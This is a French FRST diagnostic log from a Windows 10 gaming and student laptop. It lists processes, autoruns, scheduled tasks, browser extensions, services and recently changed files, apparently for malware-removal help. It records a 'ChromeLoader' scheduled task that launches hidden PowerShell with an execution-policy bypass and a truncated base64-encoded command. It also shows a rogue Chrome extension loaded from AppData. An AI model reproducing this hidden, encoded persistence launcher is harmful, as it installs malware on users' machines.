2020-03-17 11:30 - 2020-03-17 11:30 - 000000113 _____ () C:\Users\enzo3\AppData\Roaming\D2Info0
2020-10-15 13:01 - 2020-10-15 13:01 - 000000067 _____ () C:\Users\enzo3\AppData\Roaming\debug.log
2020-03-17 11:30 - 2020-03-17 12:17 - 000000008 _____ () C:\Users\enzo3\AppData\Roaming\DofusAppId0_1
2022-01-03 10:56 - 2022-01-03 10:56 - 000005887 _____ () C:\Users\enzo3\AppData\Local\archive.zip
==================== SigCheck ============================
(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)
==================== Fin de FRST.txt ========================
Exécuté par enzo3 (administrateur) sur DESKTOP-FSBRRTU (LENOVO 81SX) (02-02-2022 16:16:55)
Exécuté depuis C:\Users\enzo3\OneDrive\Bureau
Profils chargés: enzo3
Plate-forme: Microsoft Windows 10 Professionnel Version 20H2 19042.1466 (X64) Langue: Français (France)
Navigateur par défaut: Edge
Mode d'amorçage: Normal
==================== Processus (Avec liste blanche) =================
(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)
() [Fichier non signé] C:\ProgramData\myCANAL\nssm.exe
() [Fichier non signé] C:\Riot Games\Riot Client\RiotClientCrashHandler.exe
(Discord Inc. -> Discord Inc.) C:\Users\enzo3\AppData\Local\Discord\app-1.0.9003\Discord.exe <12>
(Dolby Laboratories, Inc. -> ) C:\Program Files\Common Files\Dolby\DAX3\RADARHOST\DSRHost.exe
(Dolby Laboratories, Inc. -> ) C:\Windows\System32\dolbyaposvc\DAX3API.exe <2>
(Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2>
(Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <36>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler64.exe
(Groupe Canal+ -> ) C:\ProgramData\myCANAL\myCANAL.Service.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dptf_cpu.inf_amd64_9196e89091d8bdbb\esif_uf.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\lms.inf_amd64_fddb643595e0b8d0\LMS.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_0b214be229a13e84\jhi_service.exe
(Intel(R) Rapid Storage Technology -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iaahcic.inf_amd64_120314e52c04567c\RstMwService.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\97.0.1072.76\identity_helper.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <8>
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\22.002.0103.0004\FileCoAuth.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\OneDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <3>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\GameBarPresenceWriter.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Hardware Compatibility Publisher -> ) C:\Windows\System32\FMAPP.exe
(Microsoft Windows Hardware Compatibility Publisher -> Fortemedia) C:\Windows\System32\FMService64.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCopyAccelerator.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nvlt.inf_amd64_04baa46c48be5bb8\Display.NvContainer\NVDisplay.Container.exe <2>
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe <2>
(Riot Games, Inc. -> CN) C:\Riot Games\VALORANT\live\ShooterGame\Binaries\Win64\VALORANT-Win64-Shipping.exe
(Riot Games, Inc. -> Epic Games, Inc.) C:\Riot Games\VALORANT\live\Engine\Binaries\Win64\UnrealCEFSubProcess.exe
(Riot Games, Inc. -> Riot Games) C:\Riot Games\VALORANT\live\VALORANT.exe
(Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgc.exe
(Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(Riot Games, Inc. -> Riot Games, Inc.) C:\Riot Games\Riot Client\RiotClientServices.exe
(Swift Media Entertainment, Inc. -> Blitz, Inc.) C:\Users\enzo3\AppData\Local\Programs\Blitz\Blitz.exe <11>
==================== Registre (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [1076728 2020-03-24] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3183328 2021-11-30] (Riot Games, Inc. -> Riot Games, Inc.)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [OneDrive] => C:\Program Files\Microsoft OneDrive\OneDrive.exe [2593128 2022-01-20] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [33637856 2022-01-31] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [Discord] => C:\Users\enzo3\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4268456 2022-01-16] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [com.blitz.app] => C:\Users\enzo3\AppData\Local\Programs\Blitz\Blitz.exe [121828104 2022-01-30] (Swift Media Entertainment, Inc. -> Blitz, Inc.)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\enzo3\AppData\Local\Microsoft\Teams\Update.exe [2460864 2022-01-25] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [MicrosoftEdgeAutoLaunch_791E2E07DFF3A06646456380D67EFDF8] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\98.0.4758.82\Installer\chrmstp.exe [2022-02-02] (Google LLC -> Google LLC)
==================== Tâches planifiées (Avec liste blanche) ============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {3B31DCD0-C6AE-43FC-9372-25A84935EB7D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-26] (Google LLC -> Google LLC)
Task: {4E5CD411-3440-4969-AAD3-0F387269A77E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {5BB37684-BF8D-46A2-9A09-E6F056B1C8EE} - System32\Tasks\OneDrive Per-Machine Standalone Update Task => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4078440 2022-01-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {600AED33-3FF3-4D5C-B056-FC2F4FB47C21} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {72F974CB-7EDC-48EC-BBC9-D00F9FA484DD} - System32\Tasks\Microsoft\Windows\termsrv\RemoteFX\RemoteFXvGPUDisableTask => C:\WINDOWS\System32\RemoteFXvGPUDisablement.exe Disable (Pas de fichier)
Task: {76FBDBBD-A20E-40DA-805E-53D645764953} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {81E97724-97EC-49BA-91D8-2F68F74B6AFA} - System32\Tasks\Microsoft\Windows\termsrv\RemoteFX\RemoteFXWarningTask => C:\WINDOWS\System32\RemoteFXvGPUDisablement.exe Warning (Pas de fichier)
Task: {93C1356C-CE98-44C8-AA35-ED55C004FBF2} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKAAoAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAHgAdABQAGEAdABoACkAKQB7AAoACgAJACQAYQByAGMAa (l'élément de données a 1471 caractères en plus). <==== ATTENTION
Task: {B81ADD2B-0089-410C-A503-5F18AD37F79E} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-3419220990-238505790-198961922-1001 => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4078440 2022-01-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {DA30D77D-5910-42CA-9692-E5A4C3C4E8C7} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {E2CE253F-5129-410F-9925-ED721F6A9B70} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-26] (Google LLC -> Google LLC)
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
==================== Internet (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)
Tcpip\Parameters: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{4a907000-c07b-4d2c-aae9-97ef07a16bf2}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{ca465b70-6228-419a-9e70-ed2895d6acc6}: [DhcpNameServer] 172.20.10.1
Edge:
=======
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
Edge DefaultProfile: Default
Edge Profile: C:\Users\enzo3\AppData\Local\Microsoft\Edge\User Data\Default [2022-02-02]
Edge Notifications: Default -> hxxps://www.op.gg
Edge Extension: (Zotero Connector) - C:\Users\enzo3\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\nmhdhpibnnopknkmonacoephklnflpho [2021-09-27]
FireFox:
========
FF DefaultProfile: lw8c0yru.default
FF ProfilePath: C:\Users\enzo3\AppData\Roaming\Zotero\Zotero\Profiles\lw8c0yru.default [2021-04-27]
FF Plugin: @videolan.org/vlc,version=3.0.11 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] (Microsoft Corporation -> Microsoft Corporation)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default [2022-02-02]
CHR Notifications: Default -> hxxps://aternos.org; hxxps://www.chess.com
CHR Extension: (Slides) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-03-26]
CHR Extension: (Docs) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-03-26]
CHR Extension: (Google Drive) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-27]
CHR Extension: (YouTube) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-03-26]
CHR Extension: (Zotero Connector) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekhagklcjbdpajgpjgmbionohlpdbjgc [2022-01-07]
CHR Extension: (Sheets) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-03-26]
CHR Extension: (Google Docs hors connexion) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-01-25]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-02-01]
CHR Extension: (Gmail) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-27]
CHR Extension: (Settings) - C:\Users\enzo3\AppData\Local [2022-02-02]
CHR Profile: C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-03-24]
==================== Services (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8736880 2020-10-31] (BattlEye Innovations e.K. -> )
R2 DolbyDAXAPI; C:\WINDOWS\system32\dolbyaposvc\DAX3API.exe [1926600 2019-09-02] (Dolby Laboratories, Inc. -> )
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [818304 2020-10-31] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029472 2021-10-26] (Epic Games Inc. -> Epic Games, Inc.)
S3 FileSyncHelper; C:\Program Files\Microsoft OneDrive\22.002.0103.0004\FileSyncHelper.exe [3354520 2022-01-20] (Microsoft Corporation -> Microsoft Corporation)
R2 FMAPOService; C:\WINDOWS\System32\FMService64.exe [359808 2019-08-15] (Microsoft Windows Hardware Compatibility Publisher -> Fortemedia)
R2 myCANAL Server; C:\ProgramData\myCANAL\nssm.exe [294912 2020-10-30] () [Fichier non signé]
S3 OneDrive Updater Service; C:\Program Files\Microsoft OneDrive\22.002.0103.0004\OneDriveUpdaterService.exe [3812248 2022-01-20] (Microsoft Corporation -> Microsoft Corporation)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6137040 2022-01-12] (Microsoft Windows Publisher -> Microsoft Corporation)
R3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10429808 2021-11-30] (Riot Games, Inc. -> Riot Games, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe [2876152 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe [128360 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nvlt.inf_amd64_04baa46c48be5bb8\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nvlt.inf_amd64_04baa46c48be5bb8\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
===================== Pilotes (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
R3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [166760 2019-09-26] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8480608 2021-11-29] (Riot Games, Inc. -> Riot Games, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2021-12-16] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [435432 2021-12-16] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [86248 2021-12-16] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
==================== Un mois (créés) (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2022-02-02 16:16 - 2022-02-02 16:17 - 000000000 ____D C:\FRST
2022-01-27 11:03 - 2022-01-27 11:03 - 000493461 _____ C:\Users\enzo3\Downloads\tp1_vecteur.zip
2022-01-24 14:38 - 2022-01-24 14:38 - 000129515 _____ C:\Users\enzo3\Downloads\Dossier_de_consignes_CC1.pdf
2022-01-24 14:35 - 2022-01-24 14:35 - 003618859 _____ C:\Users\enzo3\Downloads\20211217_NP_liste_postes_DGAMI_Cyber_2022.pdf
2022-01-24 14:06 - 2022-01-24 14:06 - 000000000 ____D C:\Users\enzo3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Zoom
2022-01-18 14:23 - 2022-01-18 14:23 - 001152542 _____ C:\Users\enzo3\Downloads\Exo3_integrales_Lebesgue.pdf
2022-01-18 14:23 - 2022-01-18 14:23 - 000507907 _____ C:\Users\enzo3\Downloads\Exo1-correction.pdf
2022-01-18 14:23 - 2022-01-18 14:23 - 000490531 _____ C:\Users\enzo3\Downloads\Correction2suites (1).pdf
2022-01-18 14:23 - 2022-01-18 14:23 - 000387451 _____ C:\Users\enzo3\Downloads\Correction1suite (1).pdf
2022-01-17 15:44 - 2022-01-17 15:44 - 000490531 _____ C:\Users\enzo3\Downloads\Correction2suites.pdf
2022-01-17 15:39 - 2022-01-17 15:39 - 000387451 _____ C:\Users\enzo3\Downloads\Correction1suite.pdf
2022-01-12 18:25 - 2022-01-12 18:25 - 000288009 _____ C:\Users\enzo3\Downloads\formules_stats_cc2.pdf
2022-01-12 18:24 - 2022-01-12 18:24 - 000459966 _____ C:\Users\enzo3\Downloads\Controle_continu_2021-2022.pdf
2022-01-12 18:09 - 2022-01-12 18:09 - 001433439 _____ C:\Users\enzo3\Downloads\POTIN_SCHENBERG_TP2.pdf
2022-01-12 13:34 - 2022-01-12 13:34 - 000523776 _____ (curl, hxxps://curl.se/) C:\WINDOWS\system32\curl.exe
2022-01-12 13:34 - 2022-01-12 13:34 - 000464384 _____ (curl, hxxps://curl.se/) C:\WINDOWS\SysWOW64\curl.exe
2022-01-12 13:34 - 2022-01-12 13:34 - 000011797 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-01-12 13:30 - 2022-01-12 13:30 - 000000000 ___HD C:\$WinREAgent
2022-01-10 13:19 - 2022-01-10 13:19 - 001012038 _____ C:\Users\enzo3\Downloads\4_-_Management_de_linnovation.pdf
2022-01-09 19:38 - 2022-01-09 19:38 - 004046778 _____ C:\Users\enzo3\Downloads\Exercices_Tuto_2_correction (2).pdf
2022-01-09 19:38 - 2022-01-09 19:38 - 001218545 _____ C:\Users\enzo3\Downloads\Maths_CC2_Entrainement_Exercices (1).pdf
2022-01-09 17:55 - 2022-01-09 17:56 - 004046778 _____ C:\Users\enzo3\Downloads\Exercices_Tuto_2_correction (1).pdf
2022-01-09 17:55 - 2022-01-09 17:55 - 001218545 _____ C:\Users\enzo3\Downloads\Maths_CC2_Entrainement_Exercices.pdf
2022-01-08 16:51 - 2022-01-08 16:52 - 003252622 _____ C:\Users\enzo3\Downloads\Notes_tuto_2.pdf
2022-01-08 16:51 - 2022-01-08 16:51 - 004046778 _____ C:\Users\enzo3\Downloads\Exercices_Tuto_2_correction.pdf
2022-01-07 15:03 - 2022-01-07 15:03 - 000082125 _____ C:\Users\enzo3\Downloads\TD1 (4).pdf
2022-01-03 20:49 - 2022-01-03 20:49 - 001816155 _____ C:\Users\enzo3\Downloads\Decathlon (2).pdf
2022-01-03 10:56 - 2022-01-03 10:56 - 000005887 _____ C:\Users\enzo3\AppData\Local\archive.zip
2022-01-03 10:56 - 2022-01-03 10:56 - 000000000 ____D C:\Users\enzo3\AppData\Local\chrome
==================== Un mois (modifiés) ==================
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2022-02-02 16:19 - 2020-03-17 11:33 - 000000000 ____D C:\Users\enzo3\AppData\Roaming\discord
2022-02-02 16:16 - 2020-04-16 14:26 - 000000000 ____D C:\Users\enzo3\AppData\Roaming\Blitz
2022-02-02 16:08 - 2020-03-26 14:21 - 000000000 ____D C:\Program Files (x86)\Google
2022-02-02 16:04 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-02-02 15:46 - 2020-04-04 20:25 - 000000000 ____D C:\Users\enzo3\AppData\Local\Discord
2022-02-02 15:33 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-02-02 15:29 - 2021-11-07 11:40 - 000002170 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-02-02 15:29 - 2021-04-16 23:56 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2022-02-02 15:29 - 2020-11-04 18:19 - 000001161 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zotero.lnk
2022-02-02 15:29 - 2020-07-13 15:17 - 000002442 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-02-02 15:29 - 2020-01-07 13:03 - 000019628 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1
2022-02-02 15:29 - 2020-01-05 15:13 - 000013301 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1
2022-02-02 15:29 - 2020-01-02 19:30 - 000011350 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1
2022-02-02 15:29 - 2020-01-01 22:09 - 000011593 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2022-02-02 15:29 - 2019-12-23 18:26 - 000011354 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2022-02-02 15:29 - 2019-12-23 17:14 - 000000000 ____D C:\ProgramData\Riot Games
2022-02-02 14:30 - 2021-04-30 18:01 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-02-02 11:04 - 2020-03-18 20:54 - 000000000 ____D C:\Program Files (x86)\Steam
2022-02-02 10:55 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-02-02 10:55 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-02-02 10:50 - 2021-04-30 18:08 - 001770906 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-02-02 10:50 - 2019-12-07 15:50 - 000794444 _____ C:\WINDOWS\system32\perfh00C.dat
2022-02-02 10:50 - 2019-12-07 15:50 - 000150558 _____ C:\WINDOWS\system32\perfc00C.dat
2022-02-02 10:50 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2022-02-02 10:46 - 2021-05-18 18:12 - 000000032 _____ C:\Users\enzo3\AppData\Roaming\.machineId
2022-02-02 10:45 - 2021-04-30 18:06 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-02-02 10:45 - 2021-04-30 18:00 - 000008192 ___SH C:\DumpStack.log.tmp
2022-02-02 10:45 - 2019-12-23 17:50 - 000000000 ____D C:\ProgramData\NVIDIA
2022-02-02 10:45 - 2019-12-23 12:13 - 000000134 _____ C:\WINDOWS\system32\regtest.txt
2022-02-02 10:45 - 2019-12-23 11:52 - 000000000 ___RD C:\Users\enzo3\OneDrive
2022-02-02 10:45 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState
2022-01-31 21:17 - 2021-11-07 11:40 - 000000000 ____D C:\Program Files\Microsoft OneDrive
2022-01-31 21:16 - 2019-12-07 10:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2022-01-30 20:16 - 2021-04-30 18:06 - 000004174 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{6C478CD6-A663-4147-92A3-153FD99F40F8}
2022-01-26 07:54 - 2021-06-30 15:58 - 000003540 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d73de2c4618cee
2022-01-26 07:54 - 2021-04-30 18:06 - 000003634 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-01-25 19:17 - 2020-09-30 11:51 - 000002364 _____ C:\Users\enzo3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams.lnk
2022-01-24 14:06 - 2021-03-16 15:16 - 000000000 ____D C:\Users\enzo3\AppData\Roaming\Zoom
2022-01-24 14:03 - 2021-04-30 18:06 - 000003590 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2022-01-24 14:03 - 2021-04-30 18:06 - 000003466 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2022-01-20 15:39 - 2021-12-13 16:24 - 000003588 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-3419220990-238505790-198961922-1001
2022-01-20 15:39 - 2021-11-07 11:40 - 000003194 _____ C:\WINDOWS\system32\Tasks\OneDrive Per-Machine Standalone Update Task
2022-01-12 20:59 - 2021-04-30 18:01 - 000458296 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-01-12 20:58 - 2019-12-07 15:53 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
